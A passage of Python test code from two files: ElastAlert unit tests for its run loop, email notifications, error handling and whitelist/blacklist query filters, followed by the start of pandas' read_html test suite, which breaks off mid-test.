def test_stop(ea):
""" The purpose of this test is to make sure that calling ElastAlerter.stop() will break it
out of a ElastAlerter.start() loop. This method exists to provide a mechanism for running
ElastAlert with threads and thus must be tested with threads. mock_loop verifies the loop
is running and will call stop after several iterations. """
# Exit the thread on the fourth iteration
def mock_loop():
for i in range(3):
assert ea.running
yield
ea.stop()
with mock.patch.object(ea, 'sleep_for', return_value=None):
with mock.patch.object(ea, 'sleep_for') as mock_run:
mock_run.side_effect = mock_loop()
start_thread = threading.Thread(target=ea.start)
# Set as daemon to prevent a failed test from blocking exit
start_thread.daemon = True
start_thread.start()
# Give it a few seconds to run the loop
start_thread.join(5)
assert not ea.running
assert not start_thread.is_alive()
assert mock_run.call_count == 4
def test_notify_email(ea):
mock_smtp = mock.Mock()
ea.rules[0]['notify_email'] = ['foo@foo.foo', 'bar@bar.bar']
with mock.patch('elastalert.elastalert.SMTP') as mock_smtp_f:
mock_smtp_f.return_value = mock_smtp
# Notify_email from rules, array
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[0][0][1]) == set(ea.rules[0]['notify_email'])
# With ea.notify_email
ea.notify_email = ['baz@baz.baz']
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[1][0][1]) == set(['baz@baz.baz'] + ea.rules[0]['notify_email'])
# With ea.notify email but as single string
ea.rules[0]['notify_email'] = 'foo@foo.foo'
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[2][0][1]) == set(['baz@baz.baz', 'foo@foo.foo'])
# None from rule
ea.rules[0].pop('notify_email')
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[3][0][1]) == set(['baz@baz.baz'])
def test_uncaught_exceptions(ea):
e = Exception("Errors yo!")
# With disabling set to false
ea.disable_rules_on_error = False
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# With disabling set to true
ea.disable_rules_on_error = True
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 0
assert len(ea.disabled_rules) == 1
# Changing the file should re-enable it
ea.rule_hashes = {'blah.yaml': 'abc'}
new_hashes = {'blah.yaml': 'def'}
with mock.patch.object(ea.conf['rules_loader'], 'get_hashes') as mock_hashes:
with mock.patch.object(ea.conf['rules_loader'], 'load_configuration') as mock_load:
mock_load.side_effect = [ea.disabled_rules[0]]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# Notify email is sent
ea.notify_email = 'qlo@example.com'
with mock.patch.object(ea, 'send_notification_email') as mock_email:
ea.handle_uncaught_exception(e, ea.rules[0])
assert mock_email.call_args_list[0][1] == {'exception': e, 'rule': ea.disabled_rules[0]}
def test_get_top_counts_handles_no_hits_returned(ea):
with mock.patch.object(ea, 'get_hits_terms') as mock_hits:
mock_hits.return_value = None
rule = ea.rules[0]
starttime = datetime.datetime.now() - datetime.timedelta(minutes=10)
endtime = datetime.datetime.now()
keys = ['foo']
all_counts = ea.get_top_counts(rule, starttime, endtime, keys)
assert all_counts == {'top_events_foo': {}}
def test_remove_old_events(ea):
now = ts_now()
minute = datetime.timedelta(minutes=1)
ea.rules[0]['processed_hits'] = {'foo': now - minute,
'bar': now - minute * 5,
'baz': now - minute * 15}
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=10)
# With a query delay, only events older than 20 minutes will be removed (none)
ea.rules[0]['query_delay'] = datetime.timedelta(minutes=10)
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 3
# With no query delay, the 15 minute old event will be removed
ea.rules[0].pop('query_delay')
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 2
assert 'baz' not in ea.rules[0]['processed_hits']
def test_query_with_whitelist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['five'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' \
in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_whitelist_filter_es_five(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea_sixsix.rules[0]['compare_key'] = "username"
ea_sixsix.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea_sixsix.rules[0])
ea_sixsix.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' in \
new_rule['filter'][-1]['query_string']['query']
def test_query_with_blacklist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in \
new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_blacklist_filter_es_five(ea_sixsix):
ea_sixsix.rules[0]['_source_enabled'] = False
ea_sixsix.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea_sixsix.rules[0]['compare_key'] = "username"
ea_sixsix.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea_sixsix.rules[0])
ea_sixsix.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query_string'][
'query']
|
test_html.py
|
from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
from pandas.errors import ParserError
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
params=[
"chinese_utf-16.html",
"chinese_utf-32.html",
"chinese_utf-8.html",
"letz_latin1.html",
]
)
def html_encoding_file(request, datapath):
"""Parametrized fixture for HTML encoding test filenames."""
return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
assert len(list1) == len(list2), (
"lists are not of equal size "
f"len(list1) == {len(list1)}, "
f"len(list2) == {len(list2)}"
)
msg = "not all list elements are DataFrames"
both_frames = all(
map(
lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame),
list1,
list2,
)
)
assert both_frames, msg
for frame_i, frame_j in zip(list1, list2):
tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs)
assert not frame_i.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
import bs4
monkeypatch.setattr(bs4, "__version__", "4.2")
with pytest.raises(ImportError, match="Pandas requires version"):
read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
url = "google.com"
flavor = "invalid flavor"
msg = r"\{" + flavor + r"\} is not a valid set of flavors"
with pytest.raises(ValueError, match=msg):
read_html(url, match="google", flavor=flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
@pytest.fixture(autouse=True)
def set_files(self, datapath):
self.spam_data = datapath("io", "data", "html", "spam.html")
self.spam_data_kwargs = {}
self.spam_data_kwargs["encoding"] = "UTF-8"
self.banklist_data = datapath("io", "data", "html", "banklist.html")
@pytest.fixture(autouse=True, scope="function")
def set_defaults(self, flavor, request):
self.read_html = partial(read_html, flavor=flavor)
yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/master/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@tm.network
@pytest.mark.slow
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ["Closing Date", "Updated Date"]
converted[date_cols] = converted[date_cols].apply(to_datetime)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = "Gold Canyon"
with open(self.banklist_data) as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(
self.banklist_data, match="Gold Canyon", attrs={"id": "table"}
)[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
result = self.read_html(
"""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""",
index_col=0,
)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
"""
)[0]
expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html(
"""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"]
)
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html(
"""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(
data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"]
)
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html(
"""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["C", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({"date": date_range("1/1/2001", periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=["date"], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range("1/1/2001", periods=10))
df = DataFrame(
{
"date": raw_dates.map(lambda x: str(x.date())),
"time": raw_dates.map(lambda x: str(x.time())),
}
)
res = self.read_html(
df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1
)
newdf = DataFrame({"datetime": raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_wikipedia_states_table(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
assert os.path.isfile(data), f"{repr(data)} is not a file"
assert os.path.getsize(data), f"{repr(data)} is an empty file"
result = self.read_html(data, match="Arizona", header=1)[0]
assert result.shape == (60, 12)
assert "Unnamed" in result.columns[-1]
assert result["sq mi"].dtype == np.dtype("float64")
assert np.allclose(result.loc[0, "sq mi"], 665384.04)
def test_wikipedia_states_multiindex(self, datapath):
data = datapath("io", "data", "html", "wikipedia_states.html")
result = self.read_html(data, match="Arizona", index_col=0)[0]
assert result.shape == (60, 11)
assert "Unnamed" in result.columns[-1][1]
assert result.columns.nlevels == 2
assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04)
def test_parser_error_on_empty_header_row(self):
msg = (
r"Passed header=\[0,1\] are too many "
r"rows for this multi_index of columns"
)
with pytest.raises(ParserError, match=msg):
self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""",
header=[0, 1],
)
def test_decimal_rows(self):
# GH 12907
result = self.read_html(
"""<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>""",
decimal="#",
)[0]
expected = DataFrame(data={"Header": 1100.101}, index=[0])
assert result["Header"].dtype == np.dtype("float64")
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
msg = re.escape(
"Passing a bool to header is invalid. Use header=None for no header or "
"header=int or list-like of ints to specify the row(s) making up the "
"column names"
)
for arg in [True, False]:
with pytest.raises(TypeError, match=msg):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={"a": str},
)[0]
expected = DataFrame({"a": ["0.763", "0.244"]})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244],
)[0]
expected = DataFrame({"a": [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({"a": ["N/A", "NA"]})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({"a": [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html(
"""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
